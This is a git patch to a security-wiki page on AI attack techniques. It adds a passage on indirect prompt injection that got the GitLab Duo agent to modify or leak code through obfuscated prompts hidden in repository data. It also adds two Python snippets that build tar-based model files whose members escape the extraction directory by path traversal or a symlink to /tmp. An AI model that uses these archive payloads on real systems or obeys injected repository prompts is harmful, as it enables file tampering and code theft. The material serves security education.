From 8a839ad1a0bfd3cff99a098aedbff48375ad00d2 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Wed, 25 Jun 2025 23:49:47 +0200 Subject: [PATCH] f --- src/AI/AI-MCP-Servers.md | 4 ++++ src/AI/AI-Models-RCE.md | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index 1f3d1a695..9b43c5faa 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md @@ -102,5 +102,9 @@ For more information about Prompt Injection check: AI-Prompts.md {{#endref}} +Moreover, in [**this blog**](https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo) it's explained how it was possible to abuse the GitLab AI agent to perform arbitrary actions (like modifying code or leaking code) by injecting malicious prompts in the data of the repository (even obfuscating these prompts in a way that the LLM would understand but the user wouldn't). + +Note that the malicious indirect prompts would be located in a public repository the victim user would be using; however, as the agent still has access to the repos of the user, it'll be able to access them. + {{#include ../banners/hacktricks-training.md}} diff --git a/src/AI/AI-Models-RCE.md b/src/AI/AI-Models-RCE.md index 136b962cf..746479178 100644 --- a/src/AI/AI-Models-RCE.md +++ b/src/AI/AI-Models-RCE.md @@ -68,6 +68,38 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False)) ``` +## Models to Path Traversal +As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most model formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing an attacker to write arbitrary files on the system where the model is loaded. 
+ +For example, with the following code you can create a model that will create a file in the `/tmp` directory when loaded: + +```python +import tarfile + +def escape(member): + member.name = "../../tmp/hacked" # break out of the extract dir + return member + +with tarfile.open("traversal_demo.model", "w:gz") as tf: + tf.add("harmless.txt", filter=escape) +``` + +Or, with the following code you can create a model that will create a symlink to the `/tmp` directory when loaded: + +```python +import tarfile, pathlib + +TARGET = "/tmp" # where the payload will land +PAYLOAD = "abc/hacked" + +def link_it(member): + member.type, member.linkname = tarfile.SYMTYPE, TARGET + return member + +with tarfile.open("symlink_demo.model", "w:gz") as tf: + tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it) + tf.add(PAYLOAD) # rides the symlink +``` {{#include ../banners/hacktricks-training.md}}